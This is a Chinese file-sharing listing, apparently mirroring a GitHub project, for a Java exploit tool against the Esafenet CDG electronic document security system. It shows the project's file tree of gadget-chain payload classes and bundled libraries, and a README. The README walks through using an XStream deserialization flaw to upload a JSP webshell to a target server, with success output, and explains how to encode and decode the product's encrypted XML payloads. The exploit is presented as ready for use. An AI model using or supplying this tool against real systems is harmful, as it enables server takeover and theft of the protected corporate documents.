基于Java的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用

共57个文件

java：26个

xml：15个

jar：11个

版权申诉

java

反序列化漏洞

16 浏览量 2024-07-01 10:40:24 上传评论收藏 4.61MB ZIP 举报

资源推荐

资源详情

资源评论

收起资源包目录

CDGXStreamDeserRCE-main.zip （57个子文件）

CDGXStreamDeserRCE-main

src

hutool

http

HttpConnection.java 16KB

HttpRequest.java 39KB

META-INF

MANIFEST.MF 54B

com

cdg

Exploit.java 4KB

ServiceUtil.java 986B

yso

payloads

annotation

Dependencies.java 1KB

Authors.java 2KB

custom

TemplatesImplUtil.java 10KB

CustomCommand.java 2KB

ReleaseableObjectPayload.java 182B

CommonsBeanutils2.java 2KB

ObjectPayload.java 4KB

util

BASE64Decoder.java 7KB

PayloadRunner.java 2KB

CommonUtil.java 3KB

Reflections.java 3KB

DirtyDataWrapper.java 3KB

Gadgets.java 8KB

GeneratePayload.java 5KB

Strings.java 2KB

YsoConfig.java 243B

Serializer.java 863B

utils

Http.java 2KB

Decode.java 631B

Encode.java 1KB

bcel

HackBCELs.java 926B

CodeDecoder.java 4KB

libs

woodpecker-bcel-0.1.0.jar 401KB

netty-codec-http-4.1.86.Final.jar 636KB

Rijndael.jar 7KB

xmlpull-1.1.3.1.jar 7KB

reflections-0.9.9.jar 138KB

commons-beanutils-1.9.2.jar 228KB

commons-cli-1.4.jar 53KB

permit-reflect-0.3.jar 15KB

xstream-1.4.9.jar 536KB

hutool-all-5.8.8.jar 2.29MB

javassist-3.19.0-GA.jar 732KB

CDGXStreamDeserRCE.iml 1KB

.idea

artifacts

CDGXStreamDeserRCE_jar.xml 1KB

libraries

hutool_all_5_8_8.xml 223B

xmlpull_1_1_3_1.xml 221B

commons_beanutils_1_9_2.xml 237B

woodpecker_bcel_0_1_0.xml 233B

javassist_3_19_0_GA.xml 229B

reflections_0_9_9.xml 225B

permit_reflect_0_3.xml 227B

commons_cli_1_4.xml 221B

netty_codec_http_4_1_86_Final.xml 249B

xstream_1_4_9.xml 217B

Rijndael.xml 207B

vcs.xml 167B

misc.xml 258B

modules.xml 276B

.gitignore 176B

.gitignore 227B

README.md 2KB

# CDGXStreamDeserRCE > 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全防护软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统存在XStream反序列化远程代码执行漏洞，攻击者可利用该漏洞对服务器上传任意文件，进而控制服务器权限。 ## 使用帮助信息 ```bash $ java -jar CDGXStreamDeserRCE.jar 亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 usage: Options -d,--decode <arg> 密文解码 -e,--encode <arg> 加密XML反序列化payload -h,--help 打印帮助信息 -p,--proxy <arg> 代理地址 -t,--target <arg> 目标URL -uf,--upload-file <arg> 上传文件的本地路径 ``` 文件上传利用 ```bash $ cat test1.jsp <% out.println("e165421110ba030e165421110ba03099a1c0393373c5b4399a1c0393373c5b43"); %> $ java -jar CDGXStreamDeserRCE.jar -p http://127.0.0.1:8080 -uf test1.jsp -t https://192.168.31.190:8443 [+] Exploit Successed [+] WebShell: https://192.168.31.190:8443/CDGServer3/test1.jsp $ curl -k https://192.168.31.190:8443/CDGServer3/test1.jsp e165421110ba030e165421110ba03099a1c0393373c5b4399a1c0393373c5b43 ``` 密文解码 ```bash $ java -jar CDGXStreamDeserRCE.jar -d FEPCCCLCENHIPOAFPAPDDFCGEAPNMDBMOJPMJAKKNPHOKIKIDCBPHEGKLDGNHCBDEIMODEKMKPFBAIMMNLOJJKMIICLAPJAAFGNGAKFBMPKPJMOIKODEJJMHJCCHKBMFMMFDLOMDPABOJCEAPOFDCPMKGDHFNBBIMCIPAMMIIANFPAJHFAABLLLANNIDAGNKOHONJGFGBKHFDMCLJIMICBHBJEIAAIMACN [+] Decode Successed: <?xml version='1.0' encoding="gb2312"?> <SystemReturn> <returnMessage>Error1200</returnMessage> </SystemReturn> ``` 明文编码，读取文件内容进行编码或直接对字符串进行编码 ```bash $ java -jar CDGXStreamDeserRCE.jar -e payload.xml ``` ```bash $ java -jar CDGXStreamDeserRCE.jar -e "C:\Program Files (x86)\ESAFENET\CDocGuard Server\tomcat64\webapps\CDGServer3" BCBILAKIDOOOCGKJDBBFOCGJFGFJPNJALCHEBLGLBFAMKDDLPBCFFJCJHOPGLEACMIOHIFJAGCBPOMIKLMGBAGCNBGEGNKGALLCGLOJNJBHCLMNNGHHJJNAAKPMEDFJDGCEMDADGDCEFFCGEGNFLGHCH ```

评论收藏

内容反馈

版权申诉